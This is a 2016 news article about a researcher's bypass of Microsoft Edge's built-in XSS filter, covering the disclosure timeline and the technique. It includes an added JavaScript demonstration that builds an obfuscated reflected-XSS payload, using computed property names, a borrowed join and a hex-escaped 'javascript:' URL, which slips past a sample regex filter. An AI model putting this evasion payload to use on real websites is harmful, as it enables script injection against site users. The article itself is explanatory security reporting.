The issue is not fixed; Microsoft is still working on it

Apr 16, 2016 22:15 GMT  ·  By

Gareth Heyes, one of the security researchers working for PortSwigger, the company behind the famous Burp Suite security testing toolkit, has found a bypass for Microsoft Edge's built-in XSS filter.

In practice, this means an attacker can get a reflected XSS payload past the filter and run JavaScript in the context of a vulnerable website in Edge, despite a browser-side measure Microsoft added specifically to stop that. The bypass does not by itself create a vulnerability: the target site must still reflect attacker input unsafely, and the filter is only a defense-in-depth layer on top of server-side output encoding.

XSS filters are present in several major browsers. They target reflected XSS specifically: the browser looks for script-like content in the request (URL parameters, form fields) that reappears in the server's response and neutralizes it before it can execute, so a vulnerable page is protected even though the site itself was never fixed.

Browser makers have been trying to bolster Web security by blocking some of the simpler attacks at the browser level, and XSS filters are one example. CSRF, by contrast, is still defended mostly on the server side: anti-CSRF tokens are generated and checked by the application, and the browser merely carries them along with the request.

"Basically you use the object literal as a fake array which calls the join function that constructs a string from the object literal and passes it to valueOf which in turn passes it to the location object," the researcher explained the flaw on PortSwigger's blog.

IE issues strike again

Apparently, this issue is a flaw in XSS filter code that was carried over from Internet Explorer into Edge, even though Edge is a new product altogether.

The issue was fixed in IE but remains unpatched in Edge. Mr. Heyes says he found the flaw on September 4, 2015, and reported it to Microsoft the same day.

"They acknowledged the report but didn't give me a timescale," Mr. Heyes told Softpedia. "I guess the complexity of detecting computed properties made via regex was quite difficult and probably why the fix is delayed."

The issue seems to be related to computed property names, a feature introduced in ES6 (ECMAScript 2015), the version of JavaScript standardized last year, which lets an object literal's keys be built from expressions at runtime rather than written as literal tokens a regex can match. This is not the first time that new ES6 features have aided attackers in carrying out XSS attacks. Proof-of-concept code is available here.
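The two ingredients described above, the object literal posing as an array whose string is built by a borrowed `join` and delivered through `valueOf`, and ES6 computed property names hiding the hook names from a pattern-matching filter, can be shown outside a browser. The following is an added example, not code from the article or from PortSwigger: `fakeLocation` is a constructed stand-in for the location object the researcher names as the final sink, and `NAIVE_FILTER` is a constructed, deliberately simple pattern that is not Microsoft's actual filter.

```javascript
// Added example (not from the article or PortSwigger): an object literal posing
// as a one-element array so that a borrowed Array.prototype.join builds the
// string and the valueOf coercion hook hands it to a navigation sink, with ES6
// computed property names keeping the hook names out of the source text.
// fakeLocation and NAIVE_FILTER are constructed stand-ins; neither is the
// browser's location object nor Microsoft's real filter pattern.

const visited = [];

// Stand-in for the location sink the researcher describes: a callable that
// "navigates" to whatever its `this` stringifies to and returns a primitive,
// which is what a valueOf hook must return for the coercion to complete.
function fakeLocation() {
  visited.push(String(this));
  return visited.length;
}

// A naive reflected-XSS filter (constructed): it blocks explicit navigation
// assignments and calls, a bare javascript: URL, and the coercion hook names.
const NAIVE_FILTER =
  /location\s*(\.href\s*)?=|location\.(assign|replace)\s*\(|javascript:|(valueOf|toString)\s*:/i;

function naiveFilterBlocks(src) {
  return NAIVE_FILTER.test(src);
}

// Attacker-controlled source text, as it would arrive in a reflected parameter.
//  - 0 / length:1        enough for Array.prototype.join, which emits no
//                        separator when there is a single element
//  - ['to'+'String'] and ['value'+'Of'] are ES6 computed property names, so the
//                        literal tokens "toString:" and "valueOf:" never appear
//  - \x61 inside the string literal keeps "javascript:" out of the source text
//  - +'' triggers ToPrimitive with hint "default", so valueOf runs first and
//                        calls String(this), which runs the borrowed join
const PAYLOAD_SRC =
  "return {0:'jav\\x61script:alert(1)',length:1," +
  "['to'+'String']:[].join,['value'+'Of']:fakeLocation}+'';";

// A direct version that the same filter does catch, for contrast.
const DIRECT_SRC = "location='javascript:alert(1)'";

// Run attacker source the way an injected inline script would run it.
function runPayload(src) {
  return Function('fakeLocation', src)(fakeLocation);
}

function demo() {
  const directBlocked = naiveFilterBlocks(DIRECT_SRC);   // true
  const payloadBlocked = naiveFilterBlocks(PAYLOAD_SRC); // false: nothing to match
  runPayload(PAYLOAD_SRC);
  return { directBlocked, payloadBlocked, navigatedTo: visited[visited.length - 1] };
}
```

Running `demo()` shows the direct assignment being blocked while the coercion-based payload passes the filter untouched and still delivers `javascript:alert(1)` to the sink. The only thing the filter could key on is structure the filter does not understand, which is the detection problem Mr. Heyes alludes to.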

Softpedia has also reached out to Microsoft for details on the status of this issue. We'll update the article if we're provided with an answer.

Researcher finds XSS filter bypass in Edge
Proof of concept for Edge XSS filter bypass